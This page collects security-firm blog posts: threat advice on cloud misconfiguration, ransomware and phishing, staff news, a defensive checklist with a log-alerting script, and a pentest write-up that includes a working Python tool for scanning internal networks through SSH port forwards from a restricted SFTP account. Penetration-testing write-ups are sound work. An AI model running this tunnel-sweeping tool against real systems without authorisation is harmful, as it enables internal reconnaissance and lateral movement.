Research claims 90% of businesses are now susceptible to attack due to misconfiguration, so businesses need to identify and assess how well their cloud systems are configured: enforce access restrictions, tighten overly permissive storage policies, clamp down on compliance, apply least privilege, practise credential hygiene and review virtual network functions. At the same time, they can’t afford to stand still and need to continue to expand their cloud presence to remain competitive, so will need to focus on how they can continue to build out in the cloud in a more resilient fashion. 

  2. Ransomware and phishing

Ransomware-as-a-service, or RaaS, is gaining ground, synonymous with groups such as DarkSide, Babuk and Cuba. These attacks typically involve the installation of malware, which comes about through employees installing new software or through the security team failing to lock down admin privileges. 

Phishing can vary, from scatter-gun email phishing to targeted spear phishing or text-based attacks known as “smishing”. These attacks usually involve the attacker emailing or coercing an employee into executing a malicious file or visiting a website to provide their credentials. This then allows the attacker to establish a command-and-control (C&C) connection from within the environment, gain a further foothold and attempt to escalate privileges. A recent example is the texts and emails offering an NHS pass/certificate for travel purposes with a request for payment (even though these are legitimately available for free via the NHS app).

Regularly educating users on how to spot phishing attacks and not to click on suspicious links or execute unknown attachments is imperative and you can make this relevant by running a test to see how many do fall foul of a staged attack. 

When it comes to the user device, businesses need to protect user workstations with anti-virus and EDR (Endpoint Detection and Response) solutions and to prevent the execution of unknown files or scripts as well as ensuring that all Operating Systems and applications are kept up to date. 

You can also stop a lot of this from getting through in the first place by blocking unnecessary file attachments at the email gateway or cloud solution (e.g. macro files, htm/html files, executable files/scripts) and marking inbound email as ‘EXTERNAL’. But you also need a failsafe so that in a worst-case scenario you’re prepared so ensure offline backups/snapshots are being made of critical data and regularly test that these can be restored.

  3. Abuse of collaboration tools

We expect to see increased attempts to copy common notifications sent from business services such as Office 365 (e.g. sharing and encryption emails). Attackers could start utilising alternatives to email to deliver payloads, and this could include messaging systems such as Teams. Additionally, there will be more attempts to exploit open file sharing mechanisms such as OneDrive and SharePoint sites that allow guest access, which is more common than you might think.

If you’d like help with attack mitigation or remediation, cloud configuration or advice on how to make remote working more secure, email us at contact@prisminfosec.com or call 01242 652 100 for a one-to-one consultation.

Alexis V elected to CREST-EU Council

We’re proud to announce that Alexis V, Senior Security Consultant at Prism Infosec, has been elected to the newly formed CREST-EU Council. 

CREST, an international not-for-profit accreditation and certification body that represents and supports the technical information security market, announced its intention to form the Council and an EU Chapter at the end of October. Due to meet in the new year, the council will represent its international members in the European Union and will work to “ensure greater alignment with European initiatives”. 

CREST has been restructuring since 2006 by carrying out democratic elections to form country and regional councils. These councils will feed into a single International Council which will include representation from each region. This representation will enable its members to shape and influence CREST’s strategic initiatives as well as the global cyber security market at large.

Alexis was elected to one of just ten seats on the EU Council. With over ten years’ experience of working in the UK cyber security space, he has played a crucial role at Prism Infosec over the course of the past year by establishing our office in Belgium. He currently delivers a range of penetration testing services to clientele, assists with securing sales through scoping projects, and implements our training programme to help upskill members of the team. 

Commenting on his election, Alexis said: “I’m passionate about security and encouraging and supporting others to start their cyber security journey or develop their career. Growing the Belgian office by attracting new talent, getting involved in local initiatives and developing the team has been hugely rewarding and has allowed me to draw upon my previous experience delivering Advanced Web Application Testing training at Black Hat USA. Going forward, I hope to replicate and improve upon some of the work we’ve done in the UK cyber security sector within the EU.”

Under his remit on the EU Council, Alexis hopes to be able to bridge the gap between the suppliers and consumers of security services and would like to ensure suppliers receive a consistent quality of service from within the industry which he believes can be achieved through reproducible methodologies. 

Responding to the news, Phil Robinson, Founder and Principal Consultant at Prism Infosec, said: “Alexis has such enthusiasm, knowledge and drive that I’m not at all surprised by his election. He continues to be a real asset to the Prism Infosec team and has been instrumental in our expansion and the setting up of our office in Belgium. He’s also represented the company on numerous speaking engagements where he has sought to increase awareness about new techniques and attack vectors and to promote industry best practice so he will be in his element and able to offer a unique perspective when he takes his seat on the EU Council”.

Was the NSA’s Cyber Security director right to say attackers know networks best?

By Phil Robinson

There was an interesting spat on Twitter during September when Rob Joyce, Cyber Security Director of the National Security Agency, disputed the notion put forward by security researcher @RayRedacted that “Defenders think in lists, attackers think in graphs”. (Presumably suggesting that defenders are preoccupied with tick lists and compliance while attackers are looking at the data to see where performance discrepancies and chinks in the armour lie). Joyce’s retort was that…

“Attackers put in the time to know the network and the devices better than the defenders. That’s how they win.”

His statement suggests that far from being just opportunists, attackers study the network and carefully craft their attacks. Time is on their side, which allows them to explore and reverse engineer at their leisure. And the implication is that, if their knowledge of the network outpaces your own, they capture the castle. 

But is this really true? I’d argue that there are plenty of organisations that have a strong understanding of their IT estate and a decent awareness of their environment. They may even have implemented robust defences that have met or exceeded industry best practice across their technology stacks. They know every inch of their network and what’s running over it but this doesn’t guarantee they won’t be compromised. 

What’s really happening

Security breaches occur due to a number of reasons. These can range from a lack of coverage (OS and app patching), competence (configuration weaknesses), staff awareness (password insecurity), budget (holes in defence technology), or just plain bad luck (exploiting windows of opportunity) – so it’s not just a matter of good situational awareness.

The National Cyber Security Centre (NCSC) makes the distinction that the majority of attacks are still not targeted. Most adopt a scatter-gun approach, such as phishing, water holing, ransomware and scanning, and these by far outnumber the more time-intensive targeted attacks, with 27% of businesses being attacked at least once a week and 83% of those suffering phishing attacks according to the Cyber Security Breaches Survey 2021 by the DCMS. 

There’s a good reason for this. Targeted attacks can take months of preparation and execution. The attacker will typically profile your business and probe the network for weaknesses to exploit using the oft quoted cyber kill chain approach. “Attacker time” tends to preoccupy the industry, which is why you’ll hear a lot about Mean Time to Detect (MTTD) and Mean Time to Respond (MTTR), which are terms used to hawk security solutions. But the truth is you need people and process – not just technology – to keep one step ahead of the attacker. 

What can you do?

There is no single solution or tool that can be deployed to protect against the possibility of a security breach; however, if the organisation uses a variety of proactive approaches it can reduce the likelihood of being caught unawares. Here is my top 5 list of “common sense” practices that can be used to protect an organisation and reduce the possibility of compromise.

  1. Staff/User Awareness – regular security awareness training which covers the dangers of common attacks (phishing / spear phishing etc.) and educates on what to look for and how to report them quickly. Implement a “no blame” culture and encourage reports. What you don’t want are people covering their tracks for fear of reprisals from management.
  2. Device Security – ensure that devices (such as workstations and servers but also mobile devices and other networking hardware) are configured to be as secure as possible, with users having a low level of privilege and effective Anti-Virus (AV) and/or Endpoint Detection and Response (EDR) software deployed. Remove unnecessary software, follow best practice guides on hardening (e.g. NCSC and CIS) and limit execution of unknown executables and scripts (e.g. Microsoft Defender Application Control).
  3. Centralised Management – wherever possible use a centralised security management solution (such as Mobile Device Management, centralised AV/EDR consoles and centralised patch management tools) to view and manage the estate. Do not leave the security of AV reports, patching, et al. to the individual user/workstation level. This may seem like an expensive route, but solutions exist within cloud subscription fees (e.g. Microsoft 365 and Google Workspace).
  4. Logging and Event Reporting – in the absence of a SOC or SIEM solution, wherever logs and events can be enabled across the technology stack, make sure these are set up and tuned. Ensure coverage at firewall, network device (switch/router), workstation, server, application and cloud service level. Ensure that logging is not overwhelming, to prevent alert fatigue, and that key events are prioritised (e.g. multiple password failures, AV/EDR alerts, unexpected privilege escalation).
  5. Robust Authentication – many breaches (particularly for Internet-based services) occur due to weak passwords combined with a lack of additional controls such as multi-factor authentication (MFA) or password lockouts. Review all login interfaces (prioritising Internet-facing ones) and ensure that as many as possible support these security controls.
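As an added illustration of the “key events are prioritised” point in the list above (this is example code written for this page, not anything from the original post or from a product it mentions): a small Python detector that reads sshd and sudo lines in syslog format and raises three of the alerts named there, repeated password failures from one source within a sliding window, a successful login from a source that has just been flagged, a direct root login, and a sudo to root by a user outside an assumed administrator set. The log lines are constructed for the example; the 60-second window, the five-failure threshold, the year 2021 used to complete year-less syslog timestamps and the administrator set {alice} are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample in auth.log format (not real captured data).
SAMPLE_LOG = """\
Nov  3 08:01:02 fileserver sshd[2101]: Failed password for invalid user admin from 203.0.113.7 port 40122 ssh2
Nov  3 08:01:05 fileserver sshd[2103]: Failed password for root from 203.0.113.7 port 40124 ssh2
Nov  3 08:01:09 fileserver sshd[2105]: Failed password for root from 203.0.113.7 port 40126 ssh2
Nov  3 08:01:13 fileserver sshd[2107]: Failed password for root from 203.0.113.7 port 40128 ssh2
Nov  3 08:01:20 fileserver sshd[2109]: Failed password for root from 203.0.113.7 port 40130 ssh2
Nov  3 08:01:31 fileserver sshd[2111]: Accepted password for root from 203.0.113.7 port 40132 ssh2
Nov  3 08:15:44 fileserver sshd[2200]: Failed password for alice from 198.51.100.20 port 51000 ssh2
Nov  3 08:16:01 fileserver sshd[2202]: Accepted publickey for alice from 198.51.100.20 port 51002 ssh2
Nov  3 09:02:10 fileserver sudo:    bob : TTY=pts/0 ; PWD=/home/bob ; USER=root ; COMMAND=/bin/bash
"""

LINE_RE = re.compile(r"^(\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ (sshd|sudo)(?:\[\d+\])?:\s+(.*)$")
FAIL_RE = re.compile(r"Failed password for (?:invalid user )?(\S+) from (\S+) port")
ACCEPT_RE = re.compile(r"Accepted (\S+) for (\S+) from (\S+) port")
SUDO_RE = re.compile(r"(\S+) : .*USER=(\S+) ; COMMAND=(\S+)")


def parse_ts(stamp, year=2021):
    """Syslog timestamps carry no year; the year is an assumption for this sample."""
    return datetime.strptime(f"{stamp} {year}", "%b %d %H:%M:%S %Y")


def detect(log_text, threshold=5, window_seconds=60, admins=frozenset({"alice"})):
    """Return (timestamp, rule, detail) alerts in log order.

    brute_force:                    >= threshold failures from one source within the window
    login_after_brute_force:        a successful login from a source already flagged
    root_login:                     any direct root login over SSH
    unexpected_privilege_escalation: sudo to root by a user not in the admins set
    """
    window = timedelta(seconds=window_seconds)
    failures = defaultdict(deque)   # source IP -> timestamps of recent failures
    flagged = set()                 # sources already reported as brute forcing
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                # not an sshd/sudo line; ignore
        ts, prog, msg = parse_ts(m.group(1)), m.group(2), m.group(3)
        if prog == "sshd":
            f = FAIL_RE.search(msg)
            if f:
                _user, src = f.groups()
                q = failures[src]
                q.append(ts)
                while q and ts - q[0] > window:   # slide the window forward
                    q.popleft()
                if len(q) >= threshold and src not in flagged:
                    flagged.add(src)
                    alerts.append((ts, "brute_force",
                                   f"{len(q)} failed passwords from {src} within {window_seconds}s"))
                continue
            a = ACCEPT_RE.search(msg)
            if a:
                method, user, src = a.groups()
                if src in flagged:
                    alerts.append((ts, "login_after_brute_force",
                                   f"{user} logged in ({method}) from {src}"))
                if user == "root":
                    alerts.append((ts, "root_login",
                                   f"direct root login via {method} from {src}"))
        elif prog == "sudo":
            s = SUDO_RE.search(msg)
            if s:
                user, target, cmd = s.groups()
                if target == "root" and user not in admins:
                    alerts.append((ts, "unexpected_privilege_escalation",
                                   f"{user} ran {cmd} as root"))
    return alerts


if __name__ == "__main__":
    for ts, rule, detail in detect(SAMPLE_LOG):
        print(f"{ts}  {rule:32}  {detail}")
```

On the sample, the fifth failure from 203.0.113.7 trips the window rule, the root login that follows from the same address is then reported twice (once because the source was flagged, once because it is root), and bob’s sudo shell is reported because bob is not in the assumed admin set. The deque per source is what keeps the window check O(1) per line, which matters when the same logic is pointed at a busy firewall or VPN log.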

Taking such actions will bolster defences and take the weight off the IT/security team, allowing them to monitor and respond appropriately. And they’ll be able to mitigate attacks so that as and when they do occur you can limit incursions. This all makes logical sense but security is still being sidelined in many businesses, particularly in the wake of the pandemic.

The DCMS 2021 survey reveals that a third of businesses took no remedial action following their most disruptive breach, and it’s this inertia that then paves the way for repeat or lateral attacks. The report concludes that organisations need to “recognise that good cyber security facilitates better business resilience” and suggests many businesses have focused too much on business continuity at the expense of security due to the pandemic.

Develop your awareness

Ideally, you want to begin to look critically at your network from the perspective of the attacker, and that’s where penetration testing or simulated testing comes in. There are also now frameworks that track the pattern of attacker activity. The MITRE ATT&CK (an acronym that stands for Adversarial Tactics, Techniques and Common Knowledge) framework identifies the tactics, techniques and procedures (TTPs) attackers use and contains over 245 techniques. PRE-ATT&CK looks at attacker activity that happens prior to exploitation of a target network or system, providing some idea of how attackers scope attacks. The framework is continually updated so that new approaches spotted in the wild are added. 

Such frameworks can be used to inform penetration testing, which both identifies security vulnerabilities and weaknesses and checks whether your controls are implemented and operating correctly. Tests are scoped to meet the needs of the business and so range in depth.

If you’d like to gain more visibility into your network to counter the ‘knowledge threat’ and to find out more what’s involved in pen testing your systems, email us at contact@prisminfosec.com or call +44 (0) 1242 652 100 for a quick consultation

No Shell? No Problem!

Enumerating internal networks via ssh-tunnels, Alexis V, November 2021

On a recent engagement, we were tasked to assess the security of a Secure File Transfer Protocol (SFTP) server. We were provided with a regular account to facilitate the file uploads, and so proceeded to work our way through the common checks. We tried to:

  • Log in directly via SSH with the account – this failed as the user most likely had the shell set to /usr/bin/false or similar. 
  • Attempt command execution by passing a command on the SSH command line, e.g. ssh user@host /bin/bash. This also failed, as the sftp user was set up correctly and restricted to the SFTP subsystem. 
  • Log in via SFTP, which we did, and checked to see if we were in a chroot jail – as this turned out to be the case we could not access any other directories, files, etc.
  • Attempt SSH port forwarding with the valid account. This worked: we were able to forward a local port to an internal service with a command like:  ssh -CnfN -L 31337:127.0.0.1:22 user@host

Great, so far so good: we can now reach the internal network and start searching for any services that we can exploit to gain a foothold. The problem is that this leaves us with 65,535 ports to go through, and that’s just on the SSH host itself; it doesn’t include all the possible internal hosts. Going through all of these manually would be an extremely time-consuming process.

Despite searching, I was unable to find any tools/scripts that would help me solve this problem, so we decided to write our own.

Flow Diagram of the Enumeration Technique

The concept was fairly simple and could be broken down into the following steps:

  • Create an SSH tunnel (a -L local forward) to an internal IP and port
  • Use netcat to connect to the local end of the tunnel
  • Look for a ‘connect failed’ string in ssh’s output (the client prints ‘open failed: connect failed’ when the forwarded connection is refused), indicating a closed port
  • Otherwise catch a timeout on the netcat side, indicating an open port
  • Kill the tunnel and move on to the next internal IP and port
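The procedure above written out as a working example in Python (this is an added illustration for this page, not the TunnelSweep script from the post or its GitHub repository). It assumes the account authenticates non-interactively (SSH key or agent; BatchMode=yes is passed so a password prompt fails fast instead of hanging), that the local bind port is free, and that the ssh client prints its usual “channel N: open failed: connect failed: …” line to stderr when the forwarded connection is refused. classify() holds the decision logic and runs offline; probe() needs a real pivot host and is only run from the command line.

```python
#!/usr/bin/env python3
"""Sweep internal IP:port pairs through SSH -L forwards when no shell is available."""
import socket
import subprocess
import sys
import time


def classify(ssh_stderr, received, timed_out):
    """Decide a port's state from one probe's observations.

    ssh_stderr: everything ssh printed while the probe ran
    received:   bytes that came back through the tunnel (a service banner), if any
    timed_out:  True if the read timed out with no data and no ssh error
    """
    if "open failed" in ssh_stderr:   # ssh's connect to the target was refused (RST)
        return "closed"
    if received:                      # the service spoke first, e.g. an SSH or SMTP banner
        return "open"
    if timed_out:                     # connected but silent: open (or filtered, see caveat)
        return "open"
    return "unknown"                  # channel closed without an ssh error message


def _connect_when_listening(proc, local_port, wait=15.0):
    """Connect to the local end once ssh has bound it; this first connect is the probe."""
    deadline = time.monotonic() + wait
    while time.monotonic() < deadline:
        if proc.poll() is not None:   # ssh exited early (auth failure, forward refused)
            return None
        try:
            return socket.create_connection(("127.0.0.1", local_port), timeout=1)
        except OSError:
            time.sleep(0.2)           # listener not up yet; retry
    return None


def probe(user, host, target_ip, target_port, local_port=31337, timeout=2.0):
    """Forward 127.0.0.1:local_port to target_ip:target_port via host and poke it once."""
    cmd = ["ssh", "-N", "-o", "BatchMode=yes", "-o", "ExitOnForwardFailure=yes",
           "-L", f"127.0.0.1:{local_port}:{target_ip}:{target_port}", f"{user}@{host}"]
    proc = subprocess.Popen(cmd, stdin=subprocess.DEVNULL, stdout=subprocess.DEVNULL,
                            stderr=subprocess.PIPE, text=True)
    received, timed_out, err = b"", False, ""
    try:
        sock = _connect_when_listening(proc, local_port)
        if sock is None:
            return "error"
        sock.settimeout(timeout)
        try:
            received = sock.recv(64)      # b"" means ssh closed the channel (connect failed)
        except socket.timeout:
            timed_out = True
        except OSError:
            pass
        finally:
            sock.close()
    finally:
        proc.terminate()                  # tear the tunnel down before the next target
        try:
            _, err = proc.communicate(timeout=10)
        except subprocess.TimeoutExpired:
            proc.kill()
            _, err = proc.communicate()
    return classify(err, received, timed_out)


def sweep(user, host, target_ip, ports, **kwargs):
    """Probe each port on target_ip in turn and return {port: state}."""
    results = {}
    for port in ports:
        results[port] = probe(user, host, target_ip, port, **kwargs)
        print(f"{target_ip}:{port}\t{results[port]}", flush=True)
    return results


if __name__ == "__main__":
    if len(sys.argv) < 4:
        sys.exit("usage: tunnelsweep.py user@host target_ip port [port ...]")
    ssh_user, ssh_host = sys.argv[1].split("@", 1)
    sweep(ssh_user, ssh_host, sys.argv[2], [int(p) for p in sys.argv[3:]])
```

Caveat on false positives: a port that is filtered rather than closed makes ssh’s connect hang instead of fail, so the read times out and the port is reported open. Raising timeout past the remote side’s TCP connect timeout, or reporting a silent timeout as open|filtered the way nmap does, reduces this. Each probe also re-authenticates a fresh SSH session; sharing one ssh ControlMaster socket across probes would remove most of that cost.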

After a few hours, we had a working proof of concept that (albeit slow, with a small false positive rate) got the job done. Here’s a sample output of the tool running:

TunnelSweep Output

With this information, we can then bind to the known services, access them locally, and start exploiting them to help laterally move through the network.

We’ve uploaded the code to our GitHub. Note that the script was written during an assessment, so it is in no way optimised, and it sometimes reports false positives (although these can be reduced by setting a suitable timeout variable in the script). We always appreciate pull requests!